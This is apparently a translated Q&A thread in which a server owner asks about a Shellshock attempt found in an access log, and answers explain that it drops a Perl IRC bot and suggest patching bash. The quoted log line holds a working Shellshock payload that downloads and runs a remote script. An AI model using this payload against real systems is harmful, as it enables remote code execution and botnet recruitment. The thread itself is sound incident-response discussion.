Widziałem to access.log
na moim serwerze testowym:
> 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget
> http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ;
> perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
Żaden z adresów nie jest powiązany ze mną ani z naszym zakresem adresów IP (ani niczym innym w tym zakresie). Natychmiast pomyślałem o błędzie bezpieczeństwa Shellshock / „bashdoor”.
Wygląda na to, że ktoś próbował curl
„coś” skierować na serwer, a następnie wykonał to „coś”, a następnie usunął „coś” za pomocą -rf
.
Jest to czysty serwer testowy, nie wyrządza się żadnej szkody (== nie można wyrządzić szkody oprócz ponownej instalacji) - ale czas jest bardzo interesujący. O ile pamiętam, nie widziałem czegoś takiego wcześniej.
Czy powinienem się martwić, np. Być „zainteresowany”? Czy ktoś ma pojęcie o tym, co to jest?
security
shell-script
webserver
dawidkonrad
źródło
źródło
Odpowiedzi:
To ktoś wykorzystujący błąd Shellshock. Czy możesz określić, co robił skrypt Perla? Zdecydowanie warto się w to zagłębić. Drugi użyty adres URL zwraca 404, ale
http://213.5.67.223/ji
istnieje i może być tym samym, ponieważ jest to skrypt perla. Wygląda na to, że jest to jakiś serwer IRC, więc połączenie się z serwerem testowym za pomocą klienta IRC może okazać się interesujące. EDYCJA: Komentarz mnie poprawił, jest to klient, który potrafi cię węszyć.Sprawdź także, czy skrypt perla nadal działa.
źródło
ps -ax | grep perl
lubps ax | grep perl
ps -ef
Widzę, jest tam/usr/sbin/apache2 -k start
dokładnie ten sam znacznik czasu :( Myślę więc, że atak się powiódł. Zaktualizowałem bash za pomocąsudo apt-get update && sudo apt-get install --only-upgrade bash
shell
procedurze, która mnie martwiła: my @ resp =$comando 2>&1 3>&1
; O ile wiem, nie wyrządziłem żadnej krzywdy.Luka Shellshock służy do pobierania (używania
wget
) i wykonywania złośliwego skryptu Perla, ten atak jest bardzo prosty i wymaga zainstalowania zarówno Perla, jak i wget (zakładając, że jeden z nich nie jest i jesteś pewien, że nie było innych prób włamania, twój serwer nie został naruszony).Sam skrypt jest podstawowym botem IRC skryptu-kiddie, po uruchomieniu bzdura łączy się z serwerem IRC i czeka na polecenia, wygląda na to, że ma możliwości wyszukiwania Google, najprawdopodobniej automatycznie wyszukuje podatnych hostów i próbuje je wykorzystać. Poza tym oczywiście masz podstawowy arsenał typu skiddie, którym jest powódź HTTP, powódź TCP i UDP oraz dostęp do powłoki (jako użytkownik, który uruchomił skrypt, którym byłby użytkownik, pod którym działa serwer HTTP).
źródło
Jak już wspominali inni, jest to próba wykorzystania skryptu przez dzieciaka, aby wykorzystać lukę bash w celu uruchomienia bota IRC opartego na skrypcie perl. Jeśli zaktualizowałeś bash , a ponadto, jeśli uruchamiasz apache pod chrootem tak jak ja, nie masz się czym martwić. Widzę kilka wersji tego w moim dzienniku (patrz poniżej) przynajmniej co drugi dzień od 27 września ... to tylko hałas.
Kolejna odmiana próby wykonania skryptu (skrypt w języku Python), którą właśnie zauważyłem dzisiaj ... UWAGA: google-traffic-analytics.com, gdzie jest pobierany skrypt w języku Python, nie ma oczywiście nic wspólnego z Google.
źródło